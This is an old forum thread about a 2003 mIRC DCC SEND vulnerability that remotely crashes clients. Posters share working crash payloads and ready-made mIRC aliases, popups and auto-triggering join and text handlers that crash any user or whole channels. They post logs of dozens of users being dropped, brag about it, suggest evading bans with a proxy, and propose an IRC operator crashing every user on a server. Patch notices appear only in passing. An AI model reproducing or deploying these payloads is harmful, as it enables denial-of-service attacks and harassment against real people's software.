New mIRC DCC exploit out, causes the victims client to crash, pretty handy. Effects mIRC 6.x, so most people are effected. Can be temperarily fixed by typing

umm im not sure coz i used to script a reall long time ago
anyways
your line looks like it opens a dcc server on yourself insted of attacking so..

Yes this exploit is spreading thou undernet like wildfire atm.

I;ve heard the code is

/raw PRIVMSG $1 :
DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" 1370673706 3500 4

but unsure as aint tested yet.

http://www.irchelp.org/irchelp/mirc/exploit.html more info there on it. and how to stop.

i got it workin but is it really a good idea to share it out.. due to the fact that it means any one can crash out some one elses PC???? and its not really that usefull is it

Reaper

could that same arguement not be applied to every piece of code on this board?

Freedom of information and if didnt put the info on the board. it would be found out on other boards/irc rooms and posted here anyhow.

if admin feels different. please remove my post with the code.

lol, i can only get it to crash myself

Yes it works .. funny none of the large security advisories list it yet.

The first step to removing a problem is to make it very public.
mIRC 6.12 should be ready soon.

Ah, i got it to work now -

OK OK OK good exploit...but "no smit,no kiss"..We need the code here..

I guess that is why irc networks drops alot of users today :/

IRC Oper at some irc networks

/raw PRIVMSG $1 :
DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" 1370673706 3500 4


IS the code, just replace the $1 with the users nick and send it in ur server window or any other window. The users mirc will then crash

Alt A (aliases)

/crash { raw PRIVMSG $$1 :
DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 }


command /crash NICK

crashes that person


Alt R (Remote)

on *:join:#:{ raw PRIVMSG $nick :
DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 }

when some one joins it sees if u can crash and well crashes them (harsh)

Alt p (pop -ups)

crash: //raw privmsg $$1 :
DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 0 0


right click a name and clikc the new "crash" button to crash that person

Reaper

works well for me

[16:18] * Now talking in #zwei
* Looking up ghostfa[e user info...
[16:19] -> Server: PRIVMSG ghostfa[e :
DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" 1370673706 3500 4
[16:19] -> [ghostfa[e] PING
[16:19] -> [ghostfa[e] PING
[16:19] * ghostfa[e (~hoho@tallen-100215.k.se.telia.net) Quit (Read error: Connection reset by peer)


[16:20] * ghostfa[e (~hoho@tallen-100215.k.se.telia.net) Quit (Read error: Connection reset by peer)
[16:20] * ghostfa[e (~hoho@tallen-100215.k.se.telia.net) has joined #zwei
[16:21] <ghostfa[e> how do you crash my mirc?
[16:21] <ghostfa[e> tell me
[16:21] > i dont
[16:21] <ghostfa[e> yes you do
[16:22] <ghostfa[e> how did you do it


LOL how fun

OR...

add this to a new remote file in mirc by pressing alt+r and then file >> new

alias kill { /raw PRIVMSG $1 :
DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" 1370673706 3500 4 }


and save it, then you can just type /kill NICK or even better /kill #channelname and watch as every1 leaves

*edit*

Watch you dont get banned from your favorite server, use a seperate instance of mirc with a proxy

on 1:text:*:*:/raw PRIVMSG $nick :
DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" 1370673706 3500 4

works for me

[18:14:50] -> Server: PRIVMSG #luna :
DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0
[18:14:51] * Ashes (~Aschen@062-021-237-029.ADSL-ECON.PN.NL) Quit (Read error: Connection reset by peer)
[18:14:53] * [D-X]doug (doug@82-43-41-113.cable.ubr02.croy.blueyonder.co.uk) Quit (Read error: Connection reset by peer)
[18:14:53] * Morpheus|Away (Morpheus_@Morpheus|.user.gamesnet) Quit (Read error: Connection reset by peer)
[18:14:53] * Focus (~Focus@FoCuS.user.gamesnet) Quit (Read error: Connection reset by peer)
[18:14:54] * Slayer`MTF (Slayer@Slayer[41st].user.gamesnet) Quit (Read error: Connection reset by peer)
[18:14:54] * Venom|mIRC (kefbef@Kefbef.user.gamesnet) Quit (Read error: Connection reset by peer)
[18:14:55] * GaaRa^g0n3 (~nfgnfgn@node-c-9c5d.a2000.nl) has joined #luna
[18:14:55] * |mS|Basdomain (~bas@213.93.174.59) Quit (Read error: Connection reset by peer)
[18:14:57] * iLLusion (~fac9@iLLusion|.user.gamesnet) Quit (Read error: Connection reset by peer)
[18:14:57] * mallorca (mallorca@170.Red-217-127-173.pooles.rima-tde.net) Quit (Read error: Connection reset by peer)
[18:14:58] * SainT|AwAy (~The_Sain7@D576F922.kabel.telenet.be) Quit (Read error: Connection reset by peer)
[18:14:58] * HotCube (HotCube@213.224.36.47) Quit (Read error: Connection reset by peer)
[18:14:59] * tr0ll^ (tr0ll@only.12-pack.and.already.boozed.net) Quit (Read error: EOF from client)
[18:14:59] * qwerty`MTF (qwerty@RoAcH|.user.gamesnet) Quit (Read error: Connection reset by peer)
[18:15:00] * GunSmoke|aot (..@h27n2fls35o1017.telia.com) Quit (Read error: Connection reset by peer)
[18:15:00] * Lesseh (Dr.No@cp37800-a.dbsch1.nb.home.nl) Quit (Read error: Connection reset by peer)
[18:15:01] * NavySeal (~scuderiaf@80.57.192.238) Quit (Read error: Connection reset by peer)
[18:15:02] * cZ|Jay-K (~Jay-K@jay-k.demon.nl) Quit (Read error: Connection reset by peer)
[18:15:02] * Velocity|IRC (~tuttut@V3LoCiTY.user.gamesnet) Quit (Read error: Connection reset by peer)
[18:15:02] * Sumpchild (FisIRC@0x503ea77f.kd4nxx12.adsl-dhcp.tele.dk) Quit (Read error: Connection reset by peer)
[18:15:03] * Vilya (Vilya@vilya.user.gamesnet) Quit (Read error: Connection reset by peer)
[18:15:04] * Spooky|c-less (~notyour@ua148d97.elisa.omakaista.fi) Quit (Read error: Connection reset by peer)
[18:15:05] * Cawwion (cawwion@062-021-237-029.ADSL-ECON.PN.NL) Quit (Read error: Connection reset by peer)
[18:15:05] * KiNgPyro (~kp@KingPyro.user.gamesnet) Quit (Read error: Connection reset by peer)
[18:15:07] * SMI|TeoZ (SMI_TeoZ@c-fa1572d5.02-55-73746f22.cust.bredbandsbolaget.se) Quit (Read error: Connection reset by peer)
[18:15:08] * MaGiCaL^ (~sjaak@e207167.upc-e.chello.nl) Quit (Read error: Connection reset by peer)
[18:15:09] * cZ|Jay-K (~Jay-K@jay-k.demon.nl) has joined #luna
[18:15:10] * DjEnErGy (djenergy@ADijon-107-1-9-112.w81-249.abo.wanadoo.fr) Quit (Read error: Connection reset by peer)
[18:15:11] * DaBug (~DaBug@DaBug.user.gamesnet) Quit (Read error: Connection reset by peer)
[18:15:12] * Bone|away (--@h64n2fls32o817.telia.com) Quit (Read error: Connection reset by peer)
[18:15:13] * Bedz (~Sexy@Bedz.user.gamesnet) Quit (Read error: Connection reset by peer)

nice, works good

i tried doing it on a full channel:
/kill #channelname

but it says:
*** You may not send a DCC command to the channel (#channelname)

hmm, perhaps it's because i blocked this exploit?

no they blocked it, try a different chan

works sometimes
Thanx

omg mIRC exploit..whats next hehe, sounds funny..with all u guyz testing it on people lol

some more info here

->Here<-

Uh, yeah guys, its all fun and games to test it out on a few disliked ppl or just testing it out with friends. But dropping whole rooms is pretty lame. So dont do it.

Discussion is fine, but dont drop rooms and come here and "brag" about how many ppl you dropped in one go.

Thx.

Sorry about posting the code. but the effect was achived.

the cure Mirc 6.12 from www.mirc.com

mIRC 6.12 has been released! (October 13th 2003)
mIRC v6.12 has been released to address a remote vulnerability found yesterday, capable of crashing your mIRC. The vulnerability affects versions of mIRC from v6.0 onwards, so it is highly recommended that you upgrade to mIRC v6.12. You can do so by downloading the new mIRC from the download page!

Njoy

glad to see ma code helped u lamers drop a tone of users


now if you wanna do it well.. you do it on an irc server where you are IRCOP and msg all users

that way you kill about 600 ppl

Reaper

you are crazy )))))
use exploit for EDUCATIONAL PURPOSES *ONLY* ))))))))))))))

*sigh* actually just a derivate of a very old 'instant irrsi script' to crash mIRC imho, and pretty lame to use like it´s been experienced the last 12 hrs or so...

and i bet that one will still work with the patched 'new' release...

/eval /quote privmsg ficM :\x01DCC SEND "x x x x x x x x x x x x x x x x x x x
x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x
x x x x x x x x x x x x x 31337 31337 31337 31337\x01

well, we had fun to ./kill most of those who dared to try , don´t do it, it´s plain lame!

Pitty for those who need to use such client, there are others out there...

Hmmm....won't work for me at all...

alias own {
if ($show) { echo -a * pwning $$1 }
raw -q privmsg $$1 : $+ $chr(1) $+ DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" $longip($ip) $r(1024,2000) $+ $chr(1)


here's the one i found
simpley type /own <nick> or <chan>

the last code posted needs a } at the end, like this:

alias own {
echo -a * pwning $$1
raw -q privmsg $$1 : $+ $chr(1) $+ DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" $longip($ip) $r(1024,2000) $+ $chr(1)
}

the code above works well

Haha, used that second one and it works, a little too well, got myself banend from austnet , no great loss really

From securiteam.com
/crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+
$chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }

EDIT: You add an alias named crash, replace $1 ....

most ppl are patched now.. no fun

$longip($ip) ? lol

does work for the whol channel

[02:51pm] DCC Send from nick rejected (invalid parameters)

but /kill nick works fine lol mad stuff dudes ude be suprised how many ppl dont have d fix keep killing
i feel like n ircop

mIRC 6.12 has been released! (October 13th 2003)
mIRC v6.12 has been released to address a remote vulnerability found yesterday, capable of crashing your mIRC. The vulnerability affects versions of mIRC from v6.0 onwards, so it is highly recommended that you upgrade to mIRC v6.12. You can do so by downloading the new mIRC from the download page!